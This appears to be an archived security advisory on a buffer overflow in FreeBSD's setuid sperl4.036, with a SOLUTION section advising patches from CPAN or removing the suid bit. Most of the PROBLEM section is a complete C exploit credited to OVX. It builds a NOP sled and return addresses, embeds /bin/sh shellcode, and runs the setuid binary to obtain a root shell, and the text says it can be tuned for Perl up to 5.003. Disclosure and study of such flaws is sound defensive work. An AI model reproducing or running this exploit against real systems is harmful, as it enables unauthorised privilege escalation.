COMMAND

    sperl4.036

SYSTEMS AFFECTED

    FreeBSD

PROBLEM

    With a small modification of the OFFSET value, all versions up to
    perl5.003 can be overflowed.  Credit for this goes to OVX
    (deliver@free.polbox.pl), who made this exploit available.

    /************************************************************/
    /*   Exploit for FreeBSD sperl4.036 by OVX                  */
    /************************************************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    #define BUFFER_SIZE     1400
    #define OFFSET          600

    char *get_esp(void) {
        asm("movl %esp,%eax");
    }
    char buf[BUFFER_SIZE];

    main(int argc, char *argv[])
    {
            int i;
            char execshell[] =
            "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
            "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
            "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
            "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

            for(i=0+1;i<BUFFER_SIZE-4;i+=4)
              *(char **)&buf[i] = get_esp() - OFFSET;

            memset(buf,0x90,768+1);
            memcpy(&buf[768+1],execshell,strlen(execshell));

            buf[BUFFER_SIZE-1]=0;

            execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
    }

SOLUTION

    Obtain and install the appropriate patch according to the
    instructions included with the patch.  If you have installed Perl
    from source code, you should install the source code patches.
    Patches are available from the CPAN (Comprehensive Perl Archive
    Network) archives.  Until then, you may also remove the suid bit
    from the binary.